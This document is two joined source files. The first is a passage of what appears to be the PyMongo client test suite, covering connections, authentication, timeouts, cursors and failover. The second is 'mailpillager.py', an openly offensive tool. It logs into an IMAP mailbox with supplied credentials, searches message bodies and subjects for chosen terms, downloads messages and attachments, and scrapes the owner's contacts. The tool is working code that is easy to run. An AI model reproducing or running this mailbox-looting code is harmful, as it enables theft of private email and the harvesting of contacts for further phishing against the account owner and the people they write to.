self.assertIn("replicaset='replset'", the_repr)
self.assertIn("w=1", the_repr)
self.assertIn("wtimeoutms=100", the_repr)
self.assertEqual(eval(the_repr), client)
client = MongoClient("localhost:27017,localhost:27018",
replicaSet='replset',
connectTimeoutMS=12345,
socketTimeoutMS=None,
w=1,
wtimeoutms=100,
connect=False)
the_repr = repr(client)
self.assertIn('MongoClient(host=', the_repr)
self.assertIn(
"document_class=dict, "
"tz_aware=False, "
"connect=False, ",
the_repr)
self.assertIn("connecttimeoutms=12345", the_repr)
self.assertIn("replicaset='replset'", the_repr)
self.assertIn("sockettimeoutms=None", the_repr)
self.assertIn("w=1", the_repr)
self.assertIn("wtimeoutms=100", the_repr)
self.assertEqual(eval(the_repr), client)
@client_context.require_replica_set
def test_repr_replica_set(self):
self.assertIn("MongoClient(host=[", repr(self.client))
self.assertIn(pair, repr(self.client))
def test_getters(self):
self.assertEqual(client_context.client.address, (host, port))
self.assertEqual(client_context.nodes, self.client.nodes)
def test_database_names(self):
self.client.pymongo_test.test.insert_one({"dummy": u("object")})
self.client.pymongo_test_mike.test.insert_one({"dummy": u("object")})
dbs = self.client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_mike" in dbs)
def test_drop_database(self):
self.assertRaises(TypeError, self.client.drop_database, 5)
self.assertRaises(TypeError, self.client.drop_database, None)
self.client.pymongo_test.test.insert_one({"dummy": u("object")})
self.client.pymongo_test2.test.insert_one({"dummy": u("object")})
dbs = self.client.database_names()
self.assertIn("pymongo_test", dbs)
self.assertIn("pymongo_test2", dbs)
self.client.drop_database("pymongo_test")
self.client.drop_database(self.client.pymongo_test2)
raise SkipTest("This test often fails due to SERVER-2329")
dbs = self.client.database_names()
self.assertNotIn("pymongo_test", dbs)
self.assertNotIn("pymongo_test2", dbs)
def test_close(self):
coll = self.client.pymongo_test.bar
self.client.close()
self.client.close()
coll.count()
self.client.close()
self.client.close()
coll.count()
def test_bad_uri(self):
with self.assertRaises(InvalidURI):
MongoClient("http://localhost")
@client_context.require_auth
def test_auth_from_uri(self):
self.client.admin.add_user("admin", "pass", roles=["root"])
self.addCleanup(self.client.admin.remove_user, 'admin')
self.addCleanup(remove_all_users, self.client.pymongo_test)
self.client.pymongo_test.add_user(
"user", "pass", roles=['userAdmin', 'readWrite'])
with self.assertRaises(OperationFailure):
connected(rs_or_single_client(
"mongodb://a:b@%s:%d" % (host, port)))
# No error.
connected(rs_or_single_client_noauth(
"mongodb://admin:pass@%s:%d" % (host, port)))
# Wrong database.
uri = "mongodb://admin:pass@%s:%d/pymongo_test" % (host, port)
with self.assertRaises(OperationFailure):
connected(rs_or_single_client(uri))
# No error.
connected(rs_or_single_client_noauth(
"mongodb://user:pass@%s:%d/pymongo_test" % (host, port)))
# Auth with lazy connection.
rs_or_single_client(
"mongodb://user:pass@%s:%d/pymongo_test" % (host, port),
connect=False).pymongo_test.test.find_one()
# Wrong password.
bad_client = rs_or_single_client(
"mongodb://user:wrong@%s:%d/pymongo_test" % (host, port),
connect=False)
self.assertRaises(OperationFailure,
bad_client.pymongo_test.test.find_one)
@client_context.require_auth
def test_multiple_logins(self):
self.client.pymongo_test.add_user('user1', 'pass', roles=['readWrite'])
self.client.pymongo_test.add_user('user2', 'pass', roles=['readWrite'])
self.addCleanup(remove_all_users, self.client.pymongo_test)
client = rs_or_single_client_noauth(
"mongodb://user1:pass@%s:%d/pymongo_test" % (host, port))
client.pymongo_test.test.find_one()
with self.assertRaises(OperationFailure):
# Can't log in to the same database with multiple users.
client.pymongo_test.authenticate('user2', 'pass')
client.pymongo_test.test.find_one()
client.pymongo_test.logout()
with self.assertRaises(OperationFailure):
client.pymongo_test.test.find_one()
client.pymongo_test.authenticate('user2', 'pass')
client.pymongo_test.test.find_one()
with self.assertRaises(OperationFailure):
client.pymongo_test.authenticate('user1', 'pass')
client.pymongo_test.test.find_one()
@client_context.require_auth
def test_lazy_auth_raises_operation_failure(self):
lazy_client = rs_or_single_client(
"mongodb://user:wrong@%s/pymongo_test" % host, connect=False)
assertRaisesExactly(
OperationFailure, lazy_client.test.collection.find_one)
def test_unix_socket(self):
if not hasattr(socket, "AF_UNIX"):
raise SkipTest("UNIX-sockets are not supported on this system")
mongodb_socket = '/tmp/mongodb-27017.sock'
encoded_socket = '%2Ftmp%2Fmongodb-27017.sock'
if not os.access(mongodb_socket, os.R_OK):
raise SkipTest("Socket file is not accessible")
if client_context.auth_enabled:
uri = "mongodb://%s:%s@%s" % (db_user, db_pwd, encoded_socket)
else:
uri = "mongodb://%s" % encoded_socket
# Confirm we can do operations via the socket.
client = MongoClient(uri)
client.pymongo_test.test.insert_one({"dummy": "object"})
dbs = client.database_names()
self.assertTrue("pymongo_test" in dbs)
# Confirm it fails with a missing socket.
self.assertRaises(
ConnectionFailure,
connected, MongoClient("mongodb://%2Ftmp%2Fnon-existent.sock",
serverSelectionTimeoutMS=100))
def test_fork(self):
# Test using a client before and after a fork.
if sys.platform == "win32":
raise SkipTest("Can't fork on windows")
try:
import multiprocessing
except ImportError:
raise SkipTest("No multiprocessing module")
db = self.client.pymongo_test
# Ensure a socket is opened before the fork.
db.test.find_one()
def f(pipe):
try:
kill_cursors_executor = self.client._kill_cursors_executor
servers = self.client._topology.select_servers(
any_server_selector)
# In child, only the thread that called fork() is alive.
# The first operation should revive the rest.
db.test.find_one()
wait_until(
lambda: all(s._monitor._executor._thread.is_alive()
for s in servers),
"restart monitor threads")
wait_until(lambda: kill_cursors_executor._thread.is_alive(),
"restart kill-cursors executor")
except:
traceback.print_exc() # Aid debugging.
pipe.send(True)
parent_pipe, child_pipe = multiprocessing.Pipe()
p = multiprocessing.Process(target=f, args=(child_pipe,))
p.start()
p.join(10)
child_pipe.close()
# Pipe will only have data if the child process failed.
try:
parent_pipe.recv()
self.fail()
except EOFError:
pass
def test_document_class(self):
c = self.client
db = c.pymongo_test
db.test.insert_one({"x": 1})
self.assertEqual(dict, c.codec_options.document_class)
self.assertTrue(isinstance(db.test.find_one(), dict))
self.assertFalse(isinstance(db.test.find_one(), SON))
c = rs_or_single_client(document_class=SON)
db = c.pymongo_test
self.assertEqual(SON, c.codec_options.document_class)
self.assertTrue(isinstance(db.test.find_one(), SON))
def test_timeouts(self):
client = rs_or_single_client(connectTimeoutMS=10500)
self.assertEqual(10.5, get_pool(client).opts.connect_timeout)
client = rs_or_single_client(socketTimeoutMS=10500)
self.assertEqual(10.5, get_pool(client).opts.socket_timeout)
def test_socket_timeout_ms_validation(self):
c = rs_or_single_client(socketTimeoutMS=10 * 1000)
self.assertEqual(10, get_pool(c).opts.socket_timeout)
c = connected(rs_or_single_client(socketTimeoutMS=None))
self.assertEqual(None, get_pool(c).opts.socket_timeout)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=0)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=-1)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS=1e10)
self.assertRaises(ValueError,
rs_or_single_client, socketTimeoutMS='foo')
def test_socket_timeout(self):
no_timeout = self.client
timeout_sec = 1
timeout = rs_or_single_client(socketTimeoutMS=1000 * timeout_sec)
no_timeout.pymongo_test.drop_collection("test")
no_timeout.pymongo_test.test.insert_one({"x": 1})
# A $where clause that takes a second longer than the timeout
where_func = delay(timeout_sec + 1)
def get_x(db):
doc = next(db.test.find().where(where_func))
return doc["x"]
self.assertEqual(1, get_x(no_timeout.pymongo_test))
self.assertRaises(NetworkTimeout, get_x, timeout.pymongo_test)
def test_server_selection_timeout(self):
client = MongoClient(serverSelectionTimeoutMS=100, connect=False)
self.assertAlmostEqual(0.1, client.server_selection_timeout)
client = MongoClient(serverSelectionTimeoutMS=0, connect=False)
self.assertAlmostEqual(0, client.server_selection_timeout)
self.assertRaises(ValueError, MongoClient,
serverSelectionTimeoutMS="foo", connect=False)
self.assertRaises(ValueError, MongoClient,
serverSelectionTimeoutMS=-1, connect=False)
self.assertRaises(ConfigurationError, MongoClient,
serverSelectionTimeoutMS=None, connect=False)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=100', connect=False)
self.assertAlmostEqual(0.1, client.server_selection_timeout)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=0', connect=False)
self.assertAlmostEqual(0, client.server_selection_timeout)
# Test invalid timeout in URI ignored and set to default.
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=-1', connect=False)
self.assertAlmostEqual(30, client.server_selection_timeout)
client = MongoClient(
'mongodb://localhost/?serverSelectionTimeoutMS=', connect=False)
self.assertAlmostEqual(30, client.server_selection_timeout)
def test_waitQueueTimeoutMS(self):
client = rs_or_single_client(waitQueueTimeoutMS=2000)
self.assertEqual(get_pool(client).opts.wait_queue_timeout, 2)
def test_waitQueueMultiple(self):
client = rs_or_single_client(maxPoolSize=3, waitQueueMultiple=2)
pool = get_pool(client)
self.assertEqual(pool.opts.wait_queue_multiple, 2)
self.assertEqual(pool._socket_semaphore.waiter_semaphore.counter, 6)
def test_socketKeepAlive(self):
client = rs_or_single_client(socketKeepAlive=True)
self.assertTrue(get_pool(client).opts.socket_keepalive)
def test_tz_aware(self):
self.assertRaises(ValueError, MongoClient, tz_aware='foo')
aware = rs_or_single_client(tz_aware=True)
naive = self.client
aware.pymongo_test.drop_collection("test")
now = datetime.datetime.utcnow()
aware.pymongo_test.test.insert_one({"x": now})
self.assertEqual(None, naive.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(utc, aware.pymongo_test.test.find_one()["x"].tzinfo)
self.assertEqual(
aware.pymongo_test.test.find_one()["x"].replace(tzinfo=None),
naive.pymongo_test.test.find_one()["x"])
@client_context.require_ipv6
def test_ipv6(self):
if client_context.auth_enabled:
auth_str = "%s:%s@" % (db_user, db_pwd)
else:
auth_str = ""
uri = "mongodb://%s[::1]:%d" % (auth_str, port)
if client_context.is_rs:
uri += '/?replicaSet=' + client_context.replica_set_name
client = rs_or_single_client_noauth(uri)
client.pymongo_test.test.insert_one({"dummy": u("object")})
client.pymongo_test_bernie.test.insert_one({"dummy": u("object")})
dbs = client.database_names()
self.assertTrue("pymongo_test" in dbs)
self.assertTrue("pymongo_test_bernie" in dbs)
@client_context.require_no_mongos
def test_fsync_lock_unlock(self):
if (server_is_master_with_slave(client_context.client) and
client_context.version.at_least(2, 3, 0)):
raise SkipTest('SERVER-7714')
self.assertFalse(self.client.is_locked)
# async flushing not supported on windows...
if sys.platform not in ('cygwin', 'win32'):
self.client.fsync(async=True)
self.assertFalse(self.client.is_locked)
self.client.fsync(lock=True)
self.assertTrue(self.client.is_locked)
locked = True
self.client.unlock()
for _ in range(5):
locked = self.client.is_locked
if not locked:
break
time.sleep(1)
self.assertFalse(locked)
def test_contextlib(self):
client = rs_or_single_client()
client.pymongo_test.drop_collection("test")
client.pymongo_test.test.insert_one({"foo": "bar"})
# The socket used for the previous commands has been returned to the
# pool
self.assertEqual(1, len(get_pool(client).sockets))
with contextlib.closing(client):
self.assertEqual("bar", client.pymongo_test.test.find_one()["foo"])
self.assertEqual(1, len(get_pool(client).sockets))
self.assertEqual(0, len(get_pool(client).sockets))
with client as client:
self.assertEqual("bar", client.pymongo_test.test.find_one()["foo"])
self.assertEqual(0, len(get_pool(client).sockets))
def test_interrupt_signal(self):
if sys.platform.startswith('java'):
# We can't figure out how to raise an exception on a thread that's
# blocked on a socket, whether that's the main thread or a worker,
# without simply killing the whole thread in Jython. This suggests
# PYTHON-294 can't actually occur in Jython.
raise SkipTest("Can't test interrupts in Jython")
# Test fix for PYTHON-294 -- make sure MongoClient closes its
# socket if it gets an interrupt while waiting to recv() from it.
db = self.client.pymongo_test
# A $where clause which takes 1.5 sec to execute
where = delay(1.5)
# Need exactly 1 document so find() will execute its $where clause once
db.drop_collection('foo')
db.foo.insert_one({'_id': 1})
def interrupter():
# Raises KeyboardInterrupt in the main thread
time.sleep(0.25)
thread.interrupt_main()
thread.start_new_thread(interrupter, ())
raised = False
try:
# Will be interrupted by a KeyboardInterrupt.
next(db.foo.find({'$where': where}))
except KeyboardInterrupt:
raised = True
# Can't use self.assertRaises() because it doesn't catch system
# exceptions
self.assertTrue(raised, "Didn't raise expected KeyboardInterrupt")
# Raises AssertionError due to PYTHON-294 -- Mongo's response to the
# previous find() is still waiting to be read on the socket, so the
# request id's don't match.
self.assertEqual(
{'_id': 1},
next(db.foo.find())
)
def test_operation_failure(self):
# Ensure MongoClient doesn't close socket after it gets an error
# response to getLastError. PYTHON-395.
pool = get_pool(self.client)
socket_count = len(pool.sockets)
self.assertGreaterEqual(socket_count, 1)
old_sock_info = next(iter(pool.sockets))
self.client.pymongo_test.test.drop()
self.client.pymongo_test.test.insert_one({'_id': 'foo'})
self.assertRaises(
OperationFailure,
self.client.pymongo_test.test.insert_one, {'_id': 'foo'})
self.assertEqual(socket_count, len(pool.sockets))
new_sock_info = next(iter(pool.sockets))
self.assertEqual(old_sock_info, new_sock_info)
def test_kill_cursors_with_cursoraddress(self):
if (client_context.is_mongos
and not client_context.version.at_least(2, 4, 7)):
# Old mongos sends incorrectly formatted error response when
# cursor isn't found, see SERVER-9738.
raise SkipTest("Can't test kill_cursors against old mongos")
self.collection = self.client.pymongo_test.test
self.collection.drop()
self.collection.insert_many([{'_id': i} for i in range(200)])
cursor = self.collection.find().batch_size(1)
next(cursor)
self.client.kill_cursors(
[cursor.cursor_id],
_CursorAddress(self.client.address, self.collection.full_name))
# Prevent killcursors from reaching the server while a getmore is in
# progress -- the server logs "Assertion: 16089:Cannot kill active
# cursor."
time.sleep(2)
def raises_cursor_not_found():
try:
next(cursor)
return False
except CursorNotFound:
return True
wait_until(raises_cursor_not_found, 'close cursor')
def test_kill_cursors_with_tuple(self):
if (client_context.is_mongos
and not client_context.version.at_least(2, 4, 7)):
# Old mongos sends incorrectly formatted error response when
# cursor isn't found, see SERVER-9738.
raise SkipTest("Can't test kill_cursors against old mongos")
self.collection = self.client.pymongo_test.test
self.collection.drop()
self.collection.insert_many([{'_id': i} for i in range(200)])
cursor = self.collection.find().batch_size(1)
next(cursor)
self.client.kill_cursors(
[cursor.cursor_id],
self.client.address)
# Prevent killcursors from reaching the server while a getmore is in
# progress -- the server logs "Assertion: 16089:Cannot kill active
# cursor."
time.sleep(2)
def raises_cursor_not_found():
try:
next(cursor)
return False
except CursorNotFound:
return True
wait_until(raises_cursor_not_found, 'close cursor')
def test_lazy_connect_w0(self):
# Ensure that connect-on-demand works when the first operation is
# an unacknowledged write. This exercises _writable_max_wire_version().
# Use a separate collection to avoid races where we're still
# completing an operation on a collection while the next test begins.
client = rs_or_single_client(connect=False, w=0)
client.test_lazy_connect_w0.test.insert_one({})
client = rs_or_single_client(connect=False)
client.test_lazy_connect_w0.test.update_one({}, {'$set': {'x': 1}})
client = rs_or_single_client(connect=False)
client.test_lazy_connect_w0.test.delete_one({})
@client_context.require_no_mongos
def test_exhaust_network_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
# Ensure a socket.
connected(client)
# Cause a network error.
sock_info = one(pool.sockets)
sock_info.sock.close()
cursor = collection.find(cursor_type=CursorType.EXHAUST)
with self.assertRaises(ConnectionFailure):
next(cursor)
self.assertTrue(sock_info.closed)
# The semaphore was decremented despite the error.
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
@client_context.require_auth
def test_auth_network_error(self):
# Make sure there's no semaphore leak if we get a network error
# when authenticating a new socket with cached credentials.
# Get a client with one socket so we detect if it's leaked.
c = connected(rs_or_single_client(maxPoolSize=1,
waitQueueTimeoutMS=1))
# Simulate an authenticate() call on a different socket.
credentials = auth._build_credentials_tuple(
'DEFAULT', 'admin', db_user, db_pwd, {})
c._cache_credentials('test', credentials, connect=False)
# Cause a network error on the actual socket.
pool = get_pool(c)
socket_info = one(pool.sockets)
socket_info.sock.close()
# SocketInfo.check_auth logs in with the new credential, but gets a
# socket.error. Should be reraised as AutoReconnect.
self.assertRaises(AutoReconnect, c.test.collection.find_one)
# No semaphore leak, the pool is allowed to make a new socket.
c.test.collection.find_one()
@client_context.require_no_replica_set
def test_connect_to_standalone_using_replica_set_name(self):
client = MongoClient(pair, replicaSet='anything',
serverSelectionTimeoutMS=100)
with self.assertRaises(AutoReconnect):
client.test.test.find_one()
@client_context.require_replica_set
def test_stale_getmore(self):
# A cursor is created, but its member goes down and is removed from
# the topology before the getMore message is sent. Test that
# MongoClient._send_message_with_response handles the error.
with self.assertRaises(AutoReconnect):
client = MongoClient(host, port, connect=False,
serverSelectionTimeoutMS=100,
replicaSet=client_context.replica_set_name)
client._send_message_with_response(
operation=message._GetMore('pymongo_test', 'collection',
101, 1234, client.codec_options),
address=('not-a-member', 27017))
class TestExhaustCursor(IntegrationTest):
"""Test that clients properly handle errors from exhaust cursors."""
def setUp(self):
super(TestExhaustCursor, self).setUp()
if client_context.is_mongos:
raise SkipTest("mongos doesn't support exhaust, SERVER-2627")
# mongod < 2.2.0 closes exhaust socket on error, so it behaves like
# test_exhaust_query_network_error. Here we test that on query error
# the client correctly keeps the socket *open* and checks it in.
@client_context.require_version_min(2, 2, 0)
def test_exhaust_query_server_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = connected(rs_or_single_client(maxPoolSize=1))
collection = client.pymongo_test.test
pool = get_pool(client)
sock_info = one(pool.sockets)
# This will cause OperationFailure in all mongo versions since
# the value for $orderby must be a document.
cursor = collection.find(
SON([('$query', {}), ('$orderby', True)]),
cursor_type=CursorType.EXHAUST)
self.assertRaises(OperationFailure, cursor.next)
self.assertFalse(sock_info.closed)
# The socket was checked in and the semaphore was decremented.
self.assertIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
def test_exhaust_getmore_server_error(self):
# When doing a getmore on an exhaust cursor, the socket stays checked
# out on success but it's checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
collection.drop()
collection.insert_many([{} for _ in range(200)])
self.addCleanup(client_context.client.pymongo_test.test.drop)
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
sock_info = one(pool.sockets)
cursor = collection.find(cursor_type=CursorType.EXHAUST)
# Initial query succeeds.
cursor.next()
# Cause a server error on getmore.
def receive_message(operation, request_id):
# Discard the actual server response.
SocketInfo.receive_message(sock_info, operation, request_id)
# responseFlags bit 1 is QueryFailure.
msg = struct.pack('<iiiii', 1 << 1, 0, 0, 0, 0)
msg += BSON.encode({'$err': 'mock err', 'code': 0})
return msg
saved = sock_info.receive_message
sock_info.receive_message = receive_message
self.assertRaises(OperationFailure, list, cursor)
sock_info.receive_message = saved
        # The socket is returned to the pool and it still works.
self.assertEqual(200, collection.count())
self.assertIn(sock_info, pool.sockets)
def test_exhaust_query_network_error(self):
# When doing an exhaust query, the socket stays checked out on success
# but must be checked in on error to avoid semaphore leaks.
client = connected(rs_or_single_client(maxPoolSize=1))
collection = client.pymongo_test.test
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
# Cause a network error.
sock_info = one(pool.sockets)
sock_info.sock.close()
cursor = collection.find(cursor_type=CursorType.EXHAUST)
self.assertRaises(ConnectionFailure, cursor.next)
self.assertTrue(sock_info.closed)
# The socket was closed and the semaphore was decremented.
self.assertNotIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
def test_exhaust_getmore_network_error(self):
# When doing a getmore on an exhaust cursor, the socket stays checked
# out on success but it's checked in on error to avoid semaphore leaks.
client = rs_or_single_client(maxPoolSize=1)
collection = client.pymongo_test.test
collection.drop()
collection.insert_many([{} for _ in range(200)]) # More than one batch.
pool = get_pool(client)
pool._check_interval_seconds = None # Never check.
cursor = collection.find(cursor_type=CursorType.EXHAUST)
# Initial query succeeds.
cursor.next()
# Cause a network error.
sock_info = cursor._Cursor__exhaust_mgr.sock
sock_info.sock.close()
# A getmore fails.
self.assertRaises(ConnectionFailure, list, cursor)
self.assertTrue(sock_info.closed)
# The socket was closed and the semaphore was decremented.
self.assertNotIn(sock_info, pool.sockets)
self.assertTrue(pool._socket_semaphore.acquire(blocking=False))
class TestClientLazyConnect(IntegrationTest):
"""Test concurrent operations on a lazily-connecting MongoClient."""
def _get_client(self):
return rs_or_single_client(connect=False)
def test_insert_one(self):
def reset(collection):
collection.drop()
def insert_one(collection, _):
collection.insert_one({})
def test(collection):
self.assertEqual(NTHREADS, collection.count())
lazy_client_trial(reset, insert_one, test, self._get_client)
def test_update_one(self):
def reset(collection):
collection.drop()
collection.insert_one({'i': 0})
        # Update the doc once per thread (NTHREADS times in total).
def update_one(collection, _):
collection.update_one({}, {'$inc': {'i': 1}})
def test(collection):
self.assertEqual(NTHREADS, collection.find_one()['i'])
lazy_client_trial(reset, update_one, test, self._get_client)
def test_delete_one(self):
def reset(collection):
collection.drop()
collection.insert_many([{'i': i} for i in range(NTHREADS)])
def delete_one(collection, i):
collection.delete_one({'i': i})
def test(collection):
self.assertEqual(0, collection.count())
lazy_client_trial(reset, delete_one, test, self._get_client)
def test_find_one(self):
results = []
def reset(collection):
collection.drop()
collection.insert_one({})
results[:] = []
def find_one(collection, _):
results.append(collection.find_one())
def test(collection):
self.assertEqual(NTHREADS, len(results))
lazy_client_trial(reset, find_one, test, self._get_client)
def test_max_bson_size(self):
c = self._get_client()
# max_bson_size will cause the client to connect.
ismaster = c.db.command('ismaster')
self.assertEqual(ismaster['maxBsonObjectSize'], c.max_bson_size)
if 'maxMessageSizeBytes' in ismaster:
self.assertEqual(
ismaster['maxMessageSizeBytes'],
c.max_message_size)
class TestMongoClientFailover(MockClientTest):
def test_discover_primary(self):
# Disable background refresh.
with client_knobs(heartbeat_frequency=999999):
c = MockClient(
standalones=[],
members=['a:1', 'b:2', 'c:3'],
mongoses=[],
host='b:2', # Pass a secondary.
replicaSet='rs')
wait_until(lambda: len(c.nodes) == 3, 'connect')
self.assertEqual(c.address, ('a', 1))
# Fail over.
c.kill_host('a:1')
c.mock_primary = 'b:2'
c.close()
self.assertEqual(0, len(c.nodes))
t = c._get_topology()
t.select_servers(writable_server_selector) # Reconnect.
self.assertEqual(c.address, ('b', 2))
            # a:1 is no longer in nodes.
self.assertLess(len(c.nodes), 3)
# c:3 is rediscovered.
t.select_server_by_address(('c', 3))
def test_reconnect(self):
# Verify the node list isn't forgotten during a network failure.
c = MockClient(
standalones=[],
members=['a:1', 'b:2', 'c:3'],
mongoses=[],
host='b:2', # Pass a secondary.
replicaSet='rs')
wait_until(lambda: len(c.nodes) == 3, 'connect')
# Total failure.
c.kill_host('a:1')
c.kill_host('b:2')
c.kill_host('c:3')
# MongoClient discovers it's alone.
self.assertRaises(AutoReconnect, c.db.collection.find_one)
# But it can reconnect.
c.revive_host('a:1')
c._get_topology().select_servers(writable_server_selector)
self.assertEqual(c.address, ('a', 1))
def _test_network_error(self, operation_callback):
# Verify only the disconnected server is reset by a network failure.
# Disable background refresh.
with client_knobs(heartbeat_frequency=999999):
c = MockClient(
standalones=[],
members=['a:1', 'b:2'],
mongoses=[],
host='a:1',
replicaSet='rs',
connect=False)
# Set host-specific information so we can test whether it is reset.
c.set_wire_version_range('a:1', 0, 1)
c.set_wire_version_range('b:2', 0, 2)
c._get_topology().select_servers(writable_server_selector)
wait_until(lambda: len(c.nodes) == 2, 'connect')
c.kill_host('a:1')
# MongoClient is disconnected from the primary.
self.assertRaises(AutoReconnect, operation_callback, c)
# The primary's description is reset.
server_a = c._get_topology().get_server_by_address(('a', 1))
sd_a = server_a.description
self.assertEqual(SERVER_TYPE.Unknown, sd_a.server_type)
self.assertEqual(0, sd_a.min_wire_version)
self.assertEqual(0, sd_a.max_wire_version)
# ...but not the secondary's.
server_b = c._get_topology().get_server_by_address(('b', 2))
sd_b = server_b.description
self.assertEqual(SERVER_TYPE.RSSecondary, sd_b.server_type)
self.assertEqual(0, sd_b.min_wire_version)
self.assertEqual(2, sd_b.max_wire_version)
def test_network_error_on_query(self):
callback = lambda client: client.db.collection.find_one()
self._test_network_error(callback)
def test_network_error_on_insert(self):
callback = lambda client: client.db.collection.insert_one({})
self._test_network_error(callback)
def test_network_error_on_update(self):
callback = lambda client: client.db.collection.update_one(
{}, {'$unset': 'x'})
self._test_network_error(callback)
def test_network_error_on_replace(self):
callback = lambda client: client.db.collection.replace_one({}, {})
self._test_network_error(callback)
def test_network_error_on_delete(self):
callback = lambda client: client.db.collection.delete_many({})
self._test_network_error(callback)
if __name__ == "__main__":
unittest.main()
|
mailpillager.py
|
#!/usr/bin/env python3
import os
import imaplib
import poplib
import email.parser
import re
import ssl
from threading import Thread
#-----------------------------------------------------------------------------
# Primary Pillager Class that all others are sub classes of
# This really does nothing and is just a placeholder
#-----------------------------------------------------------------------------
class Pillager():
def __init__(self, outputdir="."):
self.mailserver = None
self.port = None
self.srv = None
self.user = None
self.password = None
self.servertype = None
self.output_dir = outputdir
def getType(self):
return self.servertype
def connect(self, mailserver, port="0"):
self.mailserver = mailserver
self.port = port
self.srv = None
def disconnect(self):
return
def validate(self, user, password):
return False
def searchMessageBodies(self, term='ALL'):
return None
def searchMessageSubjects(self, term=None):
return None
def searchMessageAttachments(self, term=None):
return None
def downloadMessage(self, messageid=None):
return None
def downloadAttachment(self, messageid=None):
return None
def scrapeContacts(self):
return None
def getXsubjects(self, num=10):
return None
#-----------------------------------------------------------------------------
# IMAP subclass of Pillager Class
#-----------------------------------------------------------------------------
class IMAP(Pillager):
def __init__(self, outputdir="."):
Pillager.__init__(self, outputdir)
self.uids = None
def connect(self, mailserver, port="143"):
self.mailserver = mailserver
self.port = port
try:
            self.srv = imaplib.IMAP4(self.mailserver, self.port)
except:
self.srv = None
pass
def disconnect(self):
if (self.srv):
self.srv.close()
self.srv.logout()
def validate(self, user, password):
if (not self.srv):
return
self.user = user
self.password = password
try:
self.srv.login(user, password)
except ssl.SSLError as e:
return False
except imaplib.IMAP4.error as e:
return False
return True
def searchMessageBodies(self, term=None):
if (not self.srv):
return
if (not term):
return
matched = []
self.srv.select(readonly=True)
search_term = self.buildSearchTerm("Body", term)
typ, data = self.srv.search(None, search_term)
for uid in data[0].split():
print("MATCHED ON [%s]" % (uid))
if not uid in matched:
matched.append(uid)
return matched
def searchMessageSubjects(self, term=None):
if (not self.srv):
return
if (not term):
return
matched = []
self.srv.select(readonly=True)
search_term = self.buildSearchTerm("Subject", term)
typ, data = self.srv.search(None, search_term)
for uid in data[0].split():
header = self.srv.fetch(uid, '(BODY[HEADER])')
if (header):
header_data = header[1][0][1]
parser = email.parser.HeaderParser()
msg = parser.parsestr(header_data.decode())
print("#%s [%s] -> [%s]" %(uid, msg['from'], msg['subject']))
if not uid in matched:
matched.append(uid)
return matched
def searchMessageAttachments(self, term=None):
if (not self.srv):
return
self.getUIDs()
if (not self.uids):
return None
matched = []
for uid in self.uids:
            resp, data = self.srv.fetch(uid, "(RFC822)")  # "(RFC822)" fetches the whole raw message; headers-only is also possible
            email_body = data[0][1]  # raw message content
            mail = email.message_from_string(email_body.decode())  # parse the raw content into a Message object
#Check if any attachments at all
if mail.get_content_maintype() != 'multipart':
continue
print("["+mail["From"]+"] :" + mail["Subject"])
            # walk() yields every part recursively, so we can iterate without handling the nesting ourselves
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_maintype() == 'multipart':
continue
# is this part an attachment ?
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
print("Found attachment [%s]" % (filename))
valid = False
if (term):
for search_term in term:
if re.match(search_term, filename, re.IGNORECASE):
print("MATCHED ON [%s]" % (search_term))
valid = True
else:
valid = True
if valid:
print("Filename [%s] MATCHED search terms for uid [%s]" % (filename, uid))
if not uid in matched:
matched.append(uid)
return matched
def downloadMessage(self, messageid=None):
if (not self.srv):
return
if messageid:
            resp, data = self.srv.fetch(messageid, "(RFC822)")  # "(RFC822)" fetches the whole raw message
            email_body = data[0][1]  # raw message content
filename = self.user + "_" + messageid.decode()
file_path = os.path.join(self.output_dir, filename)
print("Downloading message id [%s] to [%s]" % (messageid, file_path))
            # Check if it's already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(email_body)
fp.close()
return None
def downloadAttachment(self, messageid=None):
if (not self.srv):
return
if messageid:
            resp, data = self.srv.fetch(messageid, "(RFC822)")  # "(RFC822)" fetches the whole raw message
            email_body = data[0][1]  # raw message content
            mail = email.message_from_string(email_body.decode())  # fetch returns bytes under Python 3, so decode before parsing
#Check if any attachments at all
if mail.get_content_maintype() != 'multipart':
return
            # walk() yields every part recursively, so we can iterate without handling the nesting ourselves
for part in mail.walk():
# multipart are just containers, so we skip them
if part.get_content_maintype() == 'multipart':
continue
# is this part an attachment ?
if part.get('Content-Disposition') is None:
continue
filename = part.get_filename()
if (not filename):
continue
file_path = os.path.join(self.output_dir, filename)
print("Downloading attachment [%s] to [%s]" % (messageid, file_path))
                # Check if it's already there
if not os.path.isfile(file_path) :
# finally write the stuff
fp = open(file_path, 'wb')
fp.write(part.get_payload(decode=True))
fp.close()
return
def scrapeContacts(self):
if (not self.srv):
return
self.getUIDs()
if (not self.uids):
return None
contacts = []
for uid in self.uids:
resp, data = self.srv.fetch(uid, "(RFC822)")
for response_part in data:
if isinstance(response_part, tuple):
msg = email.message_from_string(response_part[1].decode())
fromaddr = msg['from']
if (fromaddr):
sender = msg['from'].split()[-1]
address = re.sub(r'[<>]','',sender)
                        # Ignore any occurrences of our own email address and add to the list
if not re.search(r'' + re.escape(self.user),address) and not address in contacts:
contacts.append(address)
                            print("IDENTIFIED new contact [%s]" % (address))
